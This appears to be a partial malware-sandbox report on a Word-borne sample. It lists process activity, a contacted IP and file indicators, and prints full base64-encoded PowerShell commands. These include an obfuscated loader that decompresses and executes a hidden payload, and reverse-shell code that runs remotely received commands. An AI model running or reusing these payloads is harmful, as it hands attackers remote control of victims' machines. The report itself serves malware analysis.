nAEQASQBBAE0AdwBBAHUAQQBEAEUAQQBOACcAKwAnAGcAQQB4AEEAQwA0AEEATQBRAEEAMgBBAEQAawBBAEkAZwBBAHMAQQBDAEEAQQBPAEEAQQB3AEEAQwBrAEEATwB3AEEATgBBAEEAbwBBAEoAJwArACcAQQBCAHoAJwArACcAQQAnACsAJwBIAFEAQQBjAGcAQgBsAEEARwBFAEEAYgBRAEEAZwBBAEQAMABBAEkAQQBBAGsAQQBHAE0AQQBiAEEAQgBwAEEARwBVAEEAYgBnAEIAMABBAEMANABBAFIAdwBCAGwAQQBIAFEAQQBVAHcAQgAwAEEASABJAEEAWgBRAEIAaABBAEcAMABBAEsAQQBBAHAAQQBEAHMAQQBEAFEAQQBLAEEAQQAwAEEAJwArACcAQwBnAEIAYgBBAEcASQBBAGUAUQBCADAAQQBHAFUAQQBXAHcAQgBkAEEARgAwAEEASgBBACcAKwAnAEIAaQBBAEgAawBBAGQAQQBCAGwAQQBIAE0AQQBJACcAKwAnAEEAQQA5AEEAJwArACcAQwBBAEEATQBBAEEAdQAnACsAJwBBAEMANABBAE4AZwBBADEAQQBEAFUAQQBNAHcAQQAxAEEASAB3AEEASgBRAEIANwBBAEQAQQBBAGYAUQBBADcAQQBBADAAQQBDAGcAQgAzAEEARwBnAEEAYQBRAEIAcwBBAEcAVQBBAEsAQQBBAG8AQQBDAFEAQQBhAFEAQQBnAEEARAAwAEEASQBBAEEAawBBAEgATQBBAGQAQQBCAHkAQQBHAFUAQQBZAFEAQgB0AEEAQwA0AEEAVQBnAEIAbABBAEcARQBBAFoAQQBBAG8AQQBDAFEAQQAnACsAJwBZAGcAQgA1AEEASABRAEEAWgBRAEIAegBBAEMAdwAnACsAJwBBAEkAQQBBAHcAQQBDAHcAQQBJAEEAQQBrAEEARwBJAEEAZQBRAEIAMABBAEcAVQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAawBBAEsAUQBBAGcAQQBDADAAQQBiAGcAQgBsAEEAQwBBAEEAJwArACcATQBBAEEAcABBAEMAQQBBAGUAdwBBAE4AQQBBAG8AQQBJAEEAQQBnAEEAQwBBAEEASQBBAEEAawBBAEcAUQBBAFkAUQBCADAAQQBHAEUAQQBJAEEAQQA5AEEAQwBBAEEASwBBAEIATwBBAEcAVQBBAGQAdwAnACsAJwBBAHQAQQBFADgAQQBZAGcAQgBxAEEARwBVAEEAWQB3AEIAMABBAEMAQQBBAEwAUQBCAFUAQQBIAGsAQQBjAEEAQgBsAEEARQA0AEEAWQBRAEIAdABBAEcAVQBBAEkAQQBCAFQAQQBIAGsAQQBjAHcAQgAwAEEARwBVAEEAYgBRAEEAdQBBAEYAUQBBAFoAUQBCADQAQQBIAFEAQQBMAGcAQgBCAEEARgBNAEEAUQAnACsAJwB3AEIASgBBAEUAawBBAFIAUQBCACcAKwAnAHUAQQBHAE0AQQBiAHcAQgBrAEEARwBrAEEAYgBnAEIAbgBBAEMAawBBAEwAZwBCAEgAQQBHAFUAQQBkAEEAQgBUAEEASABRAEEAYwBnAEIAcABBAEcANAAnACsAJwBBAFoAdwBBAG8AQQBDAFEAQQBZAGcAQgA1AEEASABRAEEAWgBRAEIAegBBAEMAdwBBAE0AQQBBACcAKwAnAHMAQQBDAEEAQQBKAEEAQgBwAEEAQwBrAEEATwB3AEEATgBBAEEAbwBBACcAKwAnAEkAQQBBAGcAQQBDAEEAQQBJAEEAQQBrAEEASABNAEEAWgBRAEIAdQBBAEcAUQBBAFkAZwBCAGgAQQBHAE0AQQBhAHcAQQBnAEEARAAwAEEASQBBAEEAbwBBAEcAawBBAFoAUQBCADQAQQBDAEEAQQBKAEEAQgAnACsAJwBrAEEARwBFAEEAZABBAEIAaABBAEMAQQBBAE0AZwBBACsAQQBDAFkAQQBNAFEAQQBnAEEASAB3AEEASQBBAEIAUABBAEgAVQAnACsAJwBBAGQAQQBBAHQAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEMAQQBBAEsAUQBBADcAQQBBADAAQQBDAGcAQQBnAEEAQwBBAEEASQBBAEEAZwBBAEMAUQBBAGMAdwBCAGwAJwArACcAQQBHADQAQQBaAEEAQgBpAEEARwBFAEEAWQB3AEIAcgBBAEQASQBBAEkAQQBBADkAQQBDAEEAQQBKAEEAQgB6AEEARwBVAEEAYgBnAEIAawBBAEcASQBBAFkAUQBCAGoAQQAnACsAJwBHAHMAQQBJAEEAQQByAEEAQwBBAEEASQBnAEIAUQBBAEYATQBBAEkAQQBBAGkAQQBDAEEAQQAnACsAJwBLAHcAQQBnAEEAQwBnAEEAYwBBAEIAMwBBAEcAUQBBAEsAUQBBAHUAQQBGAEEAQQBZAFEAQgAwAEEARwBnAEEASQBBAEEAcgBBAEMAQQBBAEkAZwBBACsAQQBDAEEAJwArACcAQQBJAGcAQQA3AEEAQQAwAEEAQwBnAEEAZwBBAEMAQQBBAEkAQQBBAGcAQQBDAFEAQQBjAHcAQgBsAEEARwA0AEEAWgBBAEIAaQBBAEgAawBBAGQAQQBCAGwAQQBDAEEAQQBQAFEAQQBnAEEAQwBnAEEAVwB3AEIAMABBAEcAVQBBAGUAQQBCADAAQQBDADQAQQBaAFEAQgB1AEEARwBNAEEAYgB3AEIAawBBAEcAawBBAGIAZwBCAG4AQQBGADAAQQBPAGcAQQAnACsAJwA2ACcAKwAnAEEARQBFACcAKwAnAEEAVQB3AEIARAAnACsAJwBBAEUAawBBAFMAUQBBAHAAJwArACcAQQBDADQAJwArACcAQQBSAHcAJwArACcAQgBsAEEASABRAEEAUQBnAEIANQBBAEgAUQBBAFoAUQBCAHoAQQBDAGcAQQAnACsAJwBKAEEAQgB6AEEARwBVAEEAYgBnAEIAawAnACsAJwBBAEcASQBBAFkAUQBCAGoAQQAnACsAJwBHAHMAQQBNAGcAQQBwAEEARABzAEEARABRAEEASwBBAEMAQQBBAEkAQQBBAGcAQQBDAEEAQQBKACcAKwAnAEEAQgB6AEEASABRAEEAYwBnAEIAbABBAEcARQBBAGIAUQAnACsAJwBBAHUAQQBGAGMAQQBjAGcAQgBwAEEASABRAEEAWgBRAEEAbwBBAEMAUQBBAGMAdwBCAGwAQQBHADQAQQBaAEEAQgBpAEEASABrAEEAJwArACcAZABBAEIAbABBAEMAdwBBAE0AQQBBAHMAQQBDAFEAQQBjAHcAQgBsAEEARwA0AEEAWgBBAEIAaQBBAEgAawBBAGQAQQBCAGwAQQBDADQAJwArACcAQQBUAEEAQgBsAEEARwA0AEEAWgB3AEIAMABBAEcAZwBBAEsAUQBBADcAQQBBADAAQQBDAGcAQQBnAEEAQwBBAEEASQBBAEEAZwBBAEMAUQBBAGMAdwBCADAAQQBIAEkAJwArACcAQQBaAFEAQgBoAEEARwAwAEEATABnAEIARwBBAEcAdwBBAGQAUQBCAHoAQQBHAGcAQQBLAEEAQQBwAEEAQQAnACsAJwAwAEEAQwBnAEIAOQBBAEQAcwBBAEQAUQAnACsAJwBBAEsAJwArACcAQQBBADAAQQBDAGcAQQBrAEEARwBNAEEAYgBBAEIAcABBAEcAVQBBAGIAZwBCADAAQQBDADQAQQBRAHcAQgBzAEEARwA4AEEAYwB3AEIAbABBAEMAZwBBAEsAUQBBAD0AJwApADsADQAKACAAIAAgACAAcwBgAFQAYABBAHIAYABUAC0AcwBMAEUARQBQACAALQBTAGUAYwBvAG4AZABzACAANgAwADAALgAwADsADQAKAH0A
2232 -
powershell.exe powershell -Enc KABuAGUAVwAtAG8AQgBKAGUAQwBUACAAaQBPAC4AYwBPAG0AUABSAEUAUwBzAGkATwBuAC4ARABlAGYATABhAFQARQBzAHQAcgBlAGEAbQAoAFsAaQBPAC4ATQBFAE0ATwByAFkAUwBUAHIARQBhAE0AXQBbAHMAWQBTAHQAZQBtAC4AQwBvAG4AdgBFAFIAVABdADoAOgBGAHIAbwBtAEIAYQBzAEUANgA0AHMAdABSAGkAbgBnACgAJwByAFYAVgBSAGIAOQBvADYARgBIADUASAA0AGoAOQBZAEMAQQBtAGkAawBaAFIAYgBXAEsAZABMAFYAVwBtAFUAcgBoAHUANgBhADEAYwBKAGQAdgBmAEEAKwBtAEMAYwBBAC8ASABGADIASgBuAHQAbABIAEsAMwAvAHYAYwBkAHgAdwBtAEYAagBqAHgATQBtAGwAOABTAE8ALwBiADMAZgBlAGUAYwA3AHoAaABOAFMAeQA1AEkAYQAzAFkAbAB4AEgAaQBkAEsAbQAzAGIAagBjAHkAQQA3AHAAMQBHAHMAUgBDAE4ANABKADYAawAyAFYAeAB3AFIAbwB5AGwARgBoAC8AdwBhAEUARgBMAE0AbABkAEsAawBFAG0AaQBOAGwAKwA0AGoATgBXAG0AegBhAFUAbABDAFoAVwB4AGcAQQA1AHgANwAyADQAMwBCAE8AZQB0AGUAbwAzAEcAYwBXAGkAMwBLAFoAQgBRADAAagBXAFEARABaAGMAawBYAE0ATgA2AEQAcABvADAAcgBWADgAMABLAFcAVgBBAEoATwBJAC8AUQBMADAAMgA4AHkAOABSADcAcgB3AGYARABQAFkANAAyAHIAUABKADEAbABoAFkAUgAxAGUAYwBMAHEAVQB5AEsATQBkAEUAZAAxAG8AeABNAEEAWgAzAHYAZwBjADcAeQByAFEARwBhAFkAdQAxAGQAawBCACsARQBGAHcATgBpADMAawBRADMAVgBBAHUAUABkAGkASABRAG0AcwAzAHEATgBmAHEAdABVAFUAbQBtAGUAVgBLAGsAcgBGADgAVQBDAHMASQBoACsAMwBtAEgAYgBVAEoANQBxAFgAUgBCAFAAawB3AFEATgBMADAANgB3AHEAMgBRAGkAMgBYAG8AQwBQADcAYQBCAHMAQgArAFYANgB2AEUAUgB4AE4AdwA1AGUAbwBPAE4ATgBnAGMAUAA5AGIAagBMAGcAaQBsAFIAMAB5AFMAcQBpAGUAZwBMADAAbwBuAHQARQB3AHMANgBwAEQAMwBqADEAUwBaAGkAYwBwAEMATQBIAGwAOABzAEwAcQBEAEkATAA3AGUAdQAxAG8AMQBrADIAQwBvAEMANgBrAG8AZABsAEsAOQBnADkAcwBKAHkANwBOAGUAZgBJAGYAdQBMAFkAWgBGAGIAZwAyAFUAagBGAG0ALwBqAGQAbABWAEYASQA2AGIAQwBSAEUAMwBMAG0AaQBPAHYAYQBFADgANgAyAEYAMgBUADMAQgBqAEIAUgAxAC8AcABOAHMATgB6AFQAOQBkAHgAZABNAE8AMwBOAEwAbQBZAHYASgBHAHkAdgBEAHoAMQBPADAAMAA1AC8AbABuAEsAcgBQAGsAagBNAGsAOABYAHcAYgBKAHcARABaAE8AOABSAFAASgA0AHgASwBMADYARwBJAFgASwBSAGwANwBCADEAUwBtAEgASwBLAGMATgBIAEUAYQBpAHoAaQBaAGMAWgBGAGoAUAA1AE8ATgArAGIALwB5ADIAeQB4ADgATQBvAFoAUwAvAHoARQBZADEANABMAHUAagBRAHUAaQB0AFoAYgBaADgASABjAFMAcwBPADcATQBYAHAAbwBpAEIAMAB6AHoAVAB2AG0ASgB1ACsAVABLADEAaAB3AHkAWABOAC8ANwBwAHMAdAB2AEgAWAA5ADEARQBJAC8AOQAwADUAYgBmAHUAWQBiAHkAYQBHAEUAZAA5AFMAWQBhAGEASwB6AEgAYgBiAE0AaABFAEQAdwBXADkAaQBFAFkAOQBUAHIAZABxAEQARAB2AGMALwB6AGwAWgB6AHkAbQBnAHYAawB2AFYAYQBhAFEAWABuAFMANgBtADMAcABkAFQAYwAyAGkAZAB2AFMAYgB1AFoARwAzAGYALwBnAEIAdABwAEQAMgAzAEEAaQBBAEYASgBVAHoAOQBIAFMAQgBwAGkAUwBzAFMARwB2AHUAeQBWAGUATwBSAFoASwBJAHcAdwAxAGoASABQAFUAOQBmAGMANQBLAGQANQBEAGgARAA5ADkAMwBTAC8AbgByADEANwA5AHcAdQBMAGIAegBtAFUAZgBEADcAcQBrADUAYwAxAC8AMgBCAFAAKwBjAFAAQwBTADEAQQAyACsAUQBGADUALwBQAEkAUgB2AEoATwB5AGQAdgBqAGwANwBjADUAUgBrAFAAMwBFAHoAagBNAE0AbwBBAFgAagBUAGoARwBoAHEAUABpAHEAMgBPAGcAYQBlAEgAMwBsAHUAeABwADMAQQBRADEAZAA3AGQAUgAzAFMATwB5AG8AdwB4ADEAagBOAHkAdwBoAGQAeQBUADcATgAvAHcATwBHADEANgBVAHIAVQBsADcAMwBTADIALwBFAGMASwBpAFgAMgBSAHIAdgB2AEkALwBjAFcARQB6AGIAVwBRAFUAYQBTADQAQwB0AG4AaQBGADMAUwBUAHYAcwA2ADUASQAwAHEARQBCAFoAYgB4AGwAMgBWAEoAVwBrAHkAawBhAG8AUQBEAE0AWgBjADkAZgB5AFQAcwA1AHoARQA1AGIAcAAyAFUAdABrAFoANQBlAFIAVABxAGwAagA5AHgASgBoAFEAUwBqAGoAZABsAHYAZQA1ADgAZgBvAGYATgBVADkAWgBXAFcAeAAzAFMAagAvAE0AdQBOAFAAawBlAHMARwByAFAAYwB3AFQAVQBIAEcAUQB5AEYAYwBhAFAANwBYAHMAQwBkAGkAdABoAC8AMwBPADQAawBCAFkATwBSADQAcQBnAGkAbQBJAHAAZABQAHYAeQA2AC8AVwBIAG8AeABQAFoAdwAxAE4AKwB5AHcARABJAFcASQBXADcAegB0AHYAcwBCADgASgBEAGgANgA0AHYAegBGAEcAZgArAEwAdwBxAFAAUgA1ADEAUQBvAEcAcgB2AHcAMgBvADMARQAyAG4AUgB3AGMAdABMAHIAUgAyAGYAOQA2AEsAOQArAEwAKwByADEAQgA3ADEAdQB0ADMAdQBDAEYAMgBrAGUAYQA3AEMASABVADQAaAA2AEkAaQBOAHEAVwBVAEsAKwB1ADQAVQBuAGwALwBMAHkAegAvAGsAVAAnACkAIAAsACAAWwBTAFkAUwB0AEUAbQAuAGkATwAuAGMAbwBNAHAAUgBlAHMAcwBJAG8AbgAuAGMATwBNAFAAcgBFAHMAUwBJAE8ATgBNAE8ARABFAF0AOgA6AEQAZQBjAE8ATQBQAHIAZQBzAHMAIAApACAAfABmAE8AcgBFAEEAQwBIAC0AbwBCAEoAZQBjAHQAIAB7ACAAbgBlAFcALQBvAEIASgBlAEMAVAAgACAAcwB5AFMAdABFAG0ALgBpAG8ALgBTAHQAcgBFAGEATQByAEUAYQBkAEUAUgAoACQAXwAsAFsAdABlAFgAdAAuAGUATgBjAG8ARABJAE4ARwBdADoAOgBBAHMAYwBJAGkAKQAgAH0AKQAuAFIAZQBBAGQAVABvAGUATgBEACgAIAApAHwAIAAuACgAIAAkAFAAUwBIAG8AbQBlAFsAMgAxAF0AKwAkAHAAcwBIAE8ATQBlAFsAMwA0AF0AKwAnAFgAJwApAA==
2744-
csc.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\w5n2hyfx.cmdline"
2332-
cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\test22\AppData\Local\Temp\RES8547.tmp" "c:\Users\test22\AppData\Local\Temp\CSC8546.tmp"
2408
-
-
csc.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\c0nnsbkt.cmdline"
2400-
cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\test22\AppData\Local\Temp\RES872B.tmp" "c:\Users\test22\AppData\Local\Temp\CSC871B.tmp"
2992
-
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. |
IP Address | Status | Action |
---|---|---|
34.64.143.34 | Active | Moloch |
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
pdb_path | D:\PCC2021\ioc\word_malware\fontmgr\Release\fontmgr.pdb |
file | c:\Users\test22\AppData\Local\Temp\c0nnsbkt.dll |
file | c:\Users\test22\AppData\Local\Temp\w5n2hyfx.dll |
file | C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
cmdline | powershell -Enc KABuAGUAVwAtAG8AQgBKAGUAQwBUACAAaQBPAC4AYwBPAG0AUABSAEUAUwBzAGkATwBuAC4ARABlAGYATABhAFQARQBzAHQAcgBlAGEAbQAoAFsAaQBPAC4ATQBFAE0ATwByAFkAUwBUAHIARQBhAE0AXQBbAHMAWQBTAHQAZQBtAC4AQwBvAG4AdgBFAFIAVABdADoAOgBGAHIAbwBtAEIAYQBzAEUANgA0AHMAdABSAGkAbgBnACgAJwByAFYAVgBSAGIAOQBvADYARgBIADUASAA0AGoAOQBZAEMAQQBtAGkAawBaAFIAYgBXAEsAZABMAFYAVwBtAFUAcgBoAHUANgBhADEAYwBKAGQAdgBmAEEAKwBtAEMAYwBBAC8ASABGADIASgBuAHQAbABIAEsAMwAvAHYAYwBkAHgAdwBtAEYAagBqAHgATQBtAGwAOABTAE8ALwBiADMAZgBlAGUAYwA3AHoAaABOAFMAeQA1AEkAYQAzAFkAbAB4AEgAaQBkAEsAbQAzAGIAagBjAHkAQQA3AHAAMQBHAHMAUgBDAE4ANABKADYAawAyAFYAeAB3AFIAbwB5AGwARgBoAC8AdwBhAEUARgBMAE0AbABkAEsAawBFAG0AaQBOAGwAKwA0AGoATgBXAG0AegBhAFUAbABDAFoAVwB4AGcAQQA1AHgANwAyADQAMwBCAE8AZQB0AGUAbwAzAEcAYwBXAGkAMwBLAFoAQgBRADAAagBXAFEARABaAGMAawBYAE0ATgA2AEQAcABvADAAcgBWADgAMABLAFcAVgBBAEoATwBJAC8AUQBMADAAMgA4AHkAOABSADcAcgB3AGYARABQAFkANAAyAHIAUABKADEAbABoAFkAUgAxAGUAYwBMAHEAVQB5AEsATQBkAEUAZAAxAG8AeABNAEEAWgAzAHYAZwBjADcAeQByAFEARwBhAFkAdQAxAGQAawBCACsARQBGAHcATgBpADMAawBRADMAVgBBAHUAUABkAGkASABRAG0AcwAzAHEATgBmAHEAdABVAFUAbQBtAGUAVgBLAGsAcgBGADgAVQBDAHMASQBoACsAMwBtAEgAYgBVAEoANQBxAFgAUgBCAFAAawB3AFEATgBMADAANgB3AHEAMgBRAGkAMgBYAG8AQwBQADcAYQBCAHMAQgArAFYANgB2AEUAUgB4AE4AdwA1AGUAbwBPAE4ATgBnAGMAUAA5AGIAagBMAGcAaQBsAFIAMAB5AFMAcQBpAGUAZwBMADAAbwBuAHQARQB3AHMANgBwAEQAMwBqADEAUwBaAGkAYwBwAEMATQBIAGwAOABzAEwAcQBEAEkATAA3AGUAdQAxAG8AMQBrADIAQwBvAEMANgBrAG8AZABsAEsAOQBnADkAcwBKAHkANwBOAGUAZgBJAGYAdQBMAFkAWgBGAGIAZwAyAFUAagBGAG0ALwBqAGQAbABWAEYASQA2AGIAQwBSAEUAMwBMAG0AaQBPAHYAYQBFADgANgAyAEYAMgBUADMAQgBqAEIAUgAxAC8AcABOAHMATgB6AFQAOQBkAHgAZABNAE8AMwBOAEwAbQBZAHYASgBHAHkAdgBEAHoAMQBPADAAMAA1AC8AbABuAEsAcgBQAGsAagBNAGsAOABYAHcAYgBKAHcARABaAE8AOABSAFAASgA0AHgASwBMADYARwBJAFgASwBSAGwANwBCADEAUwBtAEgASwBLAGMATgBIAEUAYQBpAHoAaQBaAGMAWgBGAGoAUAA1AE8ATgArAGIALwB5ADIAeQB4ADgATQBvAFoAUwAvAHoARQBZADEANABMAHUAagBRAHUAaQB0AFoAYgBaADgASABjAFMAcwBPADcATQBYAHAAbwBpAEIAMAB6AHoAVAB2AG0ASgB1ACsAVABLADEAaAB3AHkAWABOAC8ANwBwAHMAdAB2AEgAWAA5ADEARQBJAC8AOQAwADUAYgBmAHUAWQBiAHkAYQBHAEUAZAA5AFMAWQBhAGEASwB6AEgAYgBiAE0AaABFAEQAdwBXADkAaQBFAFkAOQBUAHIAZABxAEQARAB2AGMALwB6AGwAWgB6AHkAbQBnAHYAawB2AFYAYQBhAFEAWABuAFMANgBtADMAcABkAFQAYwAyAGkAZAB2AFMAYgB1AFoARwAzAGYALwBnAEIAdABwAEQAMgAzAEEAaQBBAEYASgBVAHoAOQBIAFMAQgBwAGkAUwBzAFMARwB2AHUAeQBWAGUATwBSAFoASwBJAHcAdwAxAGoASABQAFUAOQBmAGMANQBLAGQANQBEAGgARAA5ADkAMwBTAC8AbgByADEANwA5AHcAdQBMAGIAegBtAFUAZgBEADcAcQBrADUAYwAxAC8AMgBCAFAAKwBjAFAAQwBTADEAQQAyACsAUQBGADUALwBQAEkAUgB2AEoATwB5AGQAdgBqAGwANwBjADUAUgBrAFAAMwBFAHoAagBNAE0AbwBBAFgAagBUAGoARwBoAHEAUABpAHEAMgBPAGcAYQBlAEgAMwBsAHUAeABwADMAQQBRADEAZAA3AGQAUgAzAFMATwB5AG8AdwB4ADEAagBOAHkAdwBoAGQAeQBUADcATgAvAHcATwBHADEANgBVAHIAVQBsADcAMwBTADIALwBFAGMASwBpAFgAMgBSAHIAdgB2AEkALwBjAFcARQB6AGIAVwBRAFUAYQBTADQAQwB0AG4AaQBGADMAUwBUAHYAcwA2ADUASQAwAHEARQBCAFoAYgB4AGwAMgBWAEoAVwBrAHkAawBhAG8AUQBEAE0AWgBjADkAZgB5AFQAcwA1AHoARQA1AGIAcAAyAFUAdABrAFoANQBlAFIAVABxAGwAagA5AHgASgBoAFEAUwBqAGoAZABsAHYAZQA1ADgAZgBvAGYATgBVADkAWgBXAFcAeAAzAFMAagAvAE0AdQBOAFAAawBlAHMARwByAFAAYwB3AFQAVQBIAEcAUQB5AEYAYwBhAFAANwBYAHMAQwBkAGkAdABoAC8AMwBPADQAawBCAFkATwBSADQAcQBnAGkAbQBJAHAAZABQAHYAeQA2AC8AVwBIAG8AeABQAFoAdwAxAE4AKwB5AHcARABJAFcASQBXADcAegB0AHYAcwBCADgASgBEAGgANgA0AHYAegBGAEcAZgArAEwAdwBxAFAAUgA1ADEAUQBvAEcAcgB2AHcAMgBvADMARQAyAG4AUgB3AGMAdABMAHIAUgAyAGYAOQA2AEsAOQArAEwAKwByADEAQgA3ADEAdQB0ADMAdQBDAEYAMgBrAGUAYQA3AEMASABVADQAaAA2AEkAaQBOAHEAVwBVAEsAKwB1ADQAVQBuAGwALwBMAHkAegAvAGsAVAAnACkAIAAsACAAWwBTAFkAUwB0AEUAbQAuAGkATwAuAGMAbwBNAHAAUgBlAHMAcwBJAG8AbgAuAGMATwBNAFAAcgBFAHMAUwBJAE8ATgBNAE8ARABFAF0AOgA6AEQAZQBjAE8ATQBQAHIAZQBzAHMAIAApACAAfABmAE8AcgBFAEEAQwBIAC0AbwBCAEoAZQBjAHQAIAB7ACAAbgBlAFcALQBvAEIASgBlAEMAVAAgACAAcwB5AFMAdABFAG0ALgBpAG8ALgBTAHQAcgBFAGEATQByAEUAYQBkAEUAUgAoACQAXwAsAFsAdABlAFgAdAAuAGUATgBjAG8ARABJAE4ARwBdADoAOgBBAHMAYwBJAGkAKQAgAH0AKQAuAFIAZQBBAGQAVABvAGUATgBEACgAIAApAHwAIAAuACgAIAAkAFAAUwBIAG8AbQBlAFsAMgAxAF0AKwAkAHAAcwBIAE8ATQBlAFsAMwA0AF0AKwAnAFgAJwApAA== |
cmdline | powershell -Enc ZgB1AG4AYwB0AGkAbwBuACAAUwBlAHQALQBXAGEAbABsAFAAYQBwAGUAcgAgAHsAIAAgACAADQAKACAAIAAgACAAcABhAHIAYQBtACAAKAANAAoAIAAgACAAIAAgACAAIAAgAFsAcABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQA9ACQAewBUAHIAYABVAEUAfQApAF0ADQAKACAAIAAgACAAIAAgACAAIAAjACAAUAByAG8AdgBpAGQAZQAgAHAAYQB0AGgAIAB0AG8AIABpAG0AYQBnAGUADQAKACAAIAAgACAAIAAgACAAIABbAHMAdAByAGkAbgBnAF0AJAB7AEkAYABNAGAAQQBnAEUAfQAsAA0ACgAgACAAIAAgACAAIAAgACAAIwAgAFAAcgBvAHYAaQBkAGUAIAB3AGEAbABsAHAAYQBwAGUAcgAgAHMAdAB5AGwAZQAgAHQAaABhAHQAIAB5AG8AdQAgAHcAbwB1AGwAZAAgAGwAaQBrAGUAIABhAHAAcABsAGkAZQBkAA0ACgAgACAAIAAgACAAIAAgACAAWwBwAGEAcgBhAG0AZQB0AGUAcgAoAE0AYQBuAGQAYQB0AG8AcgB5AD0AJAB7AEYAYABBAGAAbABTAGUAfQApAF0ADQAKACAAIAAgACAAIAAgACAAIABbAFYAYQBsAGkAZABhAHQAZQBTAGUAdAAoACgAJwBGACcAKwAnAGkAbABsACcAKQAsACAAKAAnAEYAJwArACcAaQB0ACcAKQAsACAAKAAnAFMAJwArACcAdAByAGUAJwArACcAdABjAGgAJwApACwAIAAoACcAVABpACcAKwAnAGwAZQAnACkALAAgACgAJwBDAGUAbgB0AGUAJwArACcAcgAnACkALAAgACgAJwBTAHAAYQAnACsAJwBuACcAKQApAF0ADQAKACAAIAAgACAAIAAgACAAIABbAHMAdAByAGkAbgBnAF0AJAB7AFMAYABUAHkAbABlAH0ADQAKACAAIAAgACAAKQANAAoAIAAgACAAIAAgAA0ACgAgACAAIAAgACQAewBXAGAAQQBgAEwATABwAGEAUABFAHIAYABzAFQAWQBMAGUAfQAgAD0AIABTAHcAaQB0AGMAaAAgACgAJAB7AHMAVAB5AGAAbABlAH0AKQAgAHsADQAKACAAIAAgACAAIAAgAA0ACgAgACAAIAAgACAAIAAgACAAKAAnAEYAaQBsACcAKwAnAGwAJwApACAAewAnADEAMAAnAH0ADQAKACAAIAAgACAAIAAgACAAIAAoACcARgBpACcAKwAnAHQAJwApACAAewAiADYAIgB9AA0ACgAgACAAIAAgACAAIAAgACAAKAAnAFMAdAByAGUAdAAnACsAJwBjAGgAJwApACAAewAiADIAIgB9AA0ACgAgACAAIAAgACAAIAAgACAAKAAnAFQAaQAnACsAJwBsAGUAJwApACAAewAiADAAIgB9AA0ACgAgACAAIAAgACAAIAAgACAAKAAnAEMAJwArACcAZQBuAHQAZQByACcAKQAgAHsAIgAwACIAfQANAAoAIAAgACAAIAAgACAAIAAgACgAJwBTAHAAYQAnACsAJwBuACcAKQAgAHsAJwAyADIAJwB9AA0ACgAgACAAIAAgACAAIAANAAoAIAAgACAAIAB9AA0ACgAgACAAIAAgACAADQAKACAAIAAgACAASQBmACgAJAB7AHMAVABgAFkAbABFAH0AIAAtAGUAcQAgACgAJwBUAGkAJwArACcAbABlACcAKQApACAAewANAAoAIAAgACAAIAAgAA0ACgAgACAAIAAgACAAIAAgACAAbgBFAGAAdwAtAGAAaQBUAGUAbQBgAHAAUgBPAFAAZQByAFQAeQAgAC0AUABhAHQAaAAgACgAKAAnAEgASwBDAFUAOgBrAHkANQBDACcAKwAnAG8AbgB0AHIAJwArACcAbwBsACcAKwAnACAAUAAnACsAJwBhAG4AZQBsAGsAJwArACcAeQA1AEQAZQBzAGsAdABvACcAKwAnAHAAJwApACAAIAAtAFIAZQBwAGwAQQBjAEUAJwBrAHkANQAnACwAWwBjAGgAYQByAF0AOQAyACkAIAAtAE4AYQBtAGUAIABXAGEAbABsAHAAYQBwAGUAcgBTAHQAeQBsAGUAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAAUwB0AHIAaQBuAGcAIAAtAFYAYQBsAHUAZQAgACQAewBXAGEAbABgAGwAcABBAFAAZQByAHMAVAB5AGAATABlAH0AIAAtAEYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAE4ARQBgAHcALQBJAFQARQBtAHAAUgBgAG8AYABQAGAARQByAFQAeQAgAC0AUABhAHQAaAAgACgAKAAnAEgASwAnACsAJwBDAFUAOgBsAGgAJwArACcAeABDAG8AbgB0AHIAbwBsACcAKwAnACAAJwArACcAUABhAG4AZQBsAGwAaAB4AEQAZQBzAGsAdABvAHAAJwApAC4AcgBFAHAAbABhAEMAZQAoACgAWwBjAEgAQQBSAF0AMQAwADgAKwBbAGMASABBAFIAXQAxADAANAArAFsAYwBIAEEAUgBdADEAMgAwACkALAAnAFwAJwApACkAIAAtAE4AYQBtAGUAIABUAGkAbABlAFcAYQBsAGwAcABhAHAAZQByACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgAFMAdAByAGkAbgBnACAALQBWAGEAbAB1AGUAIAAxACAALQBGAG8AcgBjAGUADQAKACAAIAAgACAAIAANAAoAIAAgACAAIAB9AA0ACgAgACAAIAAgAEUAbABzAGUAIAB7AA0ACgAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABOAGAAZQBXAC0AaQBUAEUATQBwAGAAUgBPAGAAcABFAHIAYABUAHkAIAAtAFAAYQB0AGgAIAAoACgAJwBIAEsAQwBVADoAJwArACcAagBUAGYAQwBvAG4AJwArACcAdAAnACsAJwByAG8AbAAgAFAAJwArACcAYQBuACcAKwAnAGUAJwArACcAbABqAFQAZgAnACsAJwBEAGUAcwBrAHQAbwBwACcAKQAtAFIARQBwAEwAYQBDAEUAKABbAGMASABhAFIAXQAxADAANgArAFsAYwBIAGEAUgBdADgANAArAFsAYwBIAGEAUgBdADEAMAAyACkALABbAGMASABhAFIAXQA5ADIAKQAgAC0ATgBhAG0AZQAgAFcAYQBsAGwAcABhAHAAZQByAFMAdAB5AGwAZQAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIABTAHQAcgBpAG4AZwAgAC0AVgBhAGwAdQBlACAAJAB7AHcAYQBsAEwAUABhAGAAcABFAFIAUwB0AGAAeQBgAGwAZQB9ACAALQBGAG8AcgBjAGUADQAKACAAIA